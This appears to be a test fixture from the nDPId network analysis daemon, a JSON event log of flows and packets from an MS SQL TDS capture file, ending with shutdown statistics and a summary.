00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="}
00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":14142,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":60,"global_ts_msec":1278068444666}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 38/38

Some files were not shown because too many files have changed in this diff Show More